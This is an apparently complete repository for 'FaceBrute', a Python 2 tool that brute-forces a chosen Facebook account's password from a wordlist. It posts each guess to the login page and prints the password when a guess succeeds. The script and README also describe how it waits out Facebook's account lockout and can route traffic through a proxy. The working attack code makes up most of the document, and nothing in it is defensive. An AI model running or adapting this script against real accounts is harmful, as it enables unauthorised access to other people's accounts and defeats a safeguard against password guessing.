├── .gitignore ├── LICENSE ├── README └── facebrute.py /.gitignore: -------------------------------------------------------------------------------- 1 | #Ignore dictionaries folder 2 | dictionaries/ 3 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (C) 2012 by Edgar Merino (http://devio.us/~emerino) 2 | 3 | Licensed under the Artistic License 2.0 (The License). 4 | You may not use this file except in compliance with the License. 5 | You may obtain a copy of the License at: 6 | 7 | http://www.perlfoundation.org/artistic_license_2_0 8 | 9 | THE PACKAGE IS PROVIDED BY THE COPYRIGHT HOLDER AND CONTRIBUTORS "AS 10 | IS" AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES. THE IMPLIED 11 | WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR 12 | NON-INFRINGEMENT ARE DISCLAIMED TO THE EXTENT PERMITTED BY YOUR LOCAL 13 | LAW. UNLESS REQUIRED BY LAW, NO COPYRIGHT HOLDER OR CONTRIBUTOR WILL 14 | BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL 15 | DAMAGES ARISING IN ANY WAY OUT OF THE USE OF THE PACKAGE, EVEN IF 16 | ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 17 | 18 | -------------------------------------------------------------------------------- /README: -------------------------------------------------------------------------------- 1 | FaceBrute 2 | Facebook brute force script 3 | 4 | This script tries to guess passwords for a given Facebook 5 | account using a list of passwords (dictionary). 6 | Since Facebook temporarily blocks access to accounts that 7 | continuously fail to log in, this script is coded so 8 | that it waits a specified amount of time when this happens 9 | until the lock on the account is released. 
 10 | 11 | 12 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 13 | "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT 14 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS 15 | FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT 16 | OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, 17 | SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED 18 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR 19 | PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF 20 | LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING 21 | NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 22 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 23 | 24 | 25 | 26 | Usage: 27 | 28 | facebrute.py -u username -p passdb.list [-e encoding] [-P proxy:port] 29 | -------------------------------------------------------------------------------- /facebrute.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # coding: utf-8 3 | # 4 | # FaceBrute 5 | # Facebook brute force script 6 | # 7 | # This script tries to guess passwords for a given Facebook 8 | # account using a list of passwords (dictionary). 9 | # Since Facebook temporarily blocks access to accounts that 10 | # continuously fail to log in, this script is coded so 11 | # that it waits a specified amount of time when this happens 12 | # until the lock on the account is released. 13 | # 14 | # 15 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 16 | # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT 17 | # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS 18 | # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT 19 | # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, 20 | # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED 21 | # TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR 22 | # PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF 23 | # LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING 24 | # NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 25 | # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 26 | 27 | 28 | __author__ = "emerino " 29 | __version__ = "0.3" 30 | 31 | import time 32 | import getopt 33 | import sys 34 | import httplib 35 | import urllib 36 | import re 37 | 38 | HEADERS = { 39 | "Content-type": "application/x-www-form-urlencoded", 40 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", 41 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1", 42 | # "Accept-Encoding": "gzip, deflate", 43 | "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", 44 | "Cookie": "locale=es_LA" 45 | } 46 | 47 | DATA = { 48 | "return_session": 0, 49 | "legacy_return": 1, 50 | "display": "", 51 | "session_key_only": 0, 52 | "trynum": 1, 53 | "timezone": 360, 54 | "persistent": 1, 55 | "default_persistent": 1, 56 | "login": "Entrar" 57 | } 58 | 59 | def main(argv): 60 | error, options = parse_args(argv) 61 | 62 | if error or "help" in options: 63 | usage() 64 | return 65 | 66 | DATA["email"] = options["username"] 67 | 68 | host = "www.facebook.com" 69 | port = 80 70 | resource = "/login.php" 71 | 72 | if "proxy" in options: 73 | host, port = options["proxy"].split(":") 74 | resource = "http://www.facebook.com/login.php" 75 | 76 | running = True 77 | waiting = False 78 | found = False 79 | count = 1 80 | 81 | while running: 82 | if not waiting: 83 | count = 1 84 | passwd = unicode(options["passdb"].readline().strip(), options["encoding"]) 85 | 86 | if not 
passwd: 87 | break 88 | 89 | try: 90 | waiting = False 91 | print "Trying: {0}".format(passwd.encode(options["encoding"])) 92 | 93 | 94 | conn = httplib.HTTPConnection(host, port) 95 | 96 | # needs to be encoded in utf-8 for urlencode 97 | DATA["pass"] = passwd.encode("utf-8") 98 | params = urllib.urlencode(DATA) 99 | 100 | conn.request("POST", resource, params, HEADERS) 101 | response = conn.getresponse() 102 | 103 | response = response.read() 104 | conn.close() 105 | 106 | if len(response.strip()) == 0: 107 | found = True 108 | print "SUCCESS: {0}".format(passwd.encode(options["encoding"])) 109 | break 110 | elif response.find("menudo") != -1: 111 | waiting = True 112 | print "Waiting..." 113 | time.sleep(60 * count) 114 | 115 | count += 1 116 | except Exception, err: 117 | print "An error ocurred: ", str(err) 118 | 119 | if not found: 120 | print "FAILED: None of the provided passwords worked!" 121 | 122 | def parse_args(argv): 123 | options = { "encoding": "utf-8" } 124 | error = False 125 | 126 | try: 127 | opts, args = getopt.getopt(argv, "u:p:e:P:h", ["username=", "passdb=", "encoding=", "proxy=", "help"]) 128 | 129 | for opt, arg in opts: 130 | if opt in ("-u", "--username"): 131 | options["username"] = arg 132 | elif opt in ("-p", "--passdb"): 133 | options["passdb"] = open(arg) 134 | elif opt in ("-e", "--encoding"): 135 | options["encoding"] = arg 136 | elif opt in ("-P", "--proxy"): 137 | if not re.search("^(\w+|\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}):\d+$", arg): 138 | raise Exception("Invalid format for proxy, should be host:port") 139 | 140 | options["proxy"] = arg 141 | elif opt in ("-h", "--help"): 142 | options["help"] = True 143 | else: 144 | error = True 145 | except Exception, err: 146 | error = True 147 | print str(err) 148 | 149 | if "username" not in options or "passdb" not in options: 150 | error = True 151 | 152 | return error, options 153 | 154 | def usage(): 155 | print """Facebook Brute Forcer v{0} 156 | 157 | 158 | Usage: 159 | 160 | 
facebrute.py -u email -p passdb.list [-e encoding] [-P proxy:port]""".format(__version__) 161 | 162 | if __name__ == "__main__": 163 | main(sys.argv[1:]) 164 | --------------------------------------------------------------------------------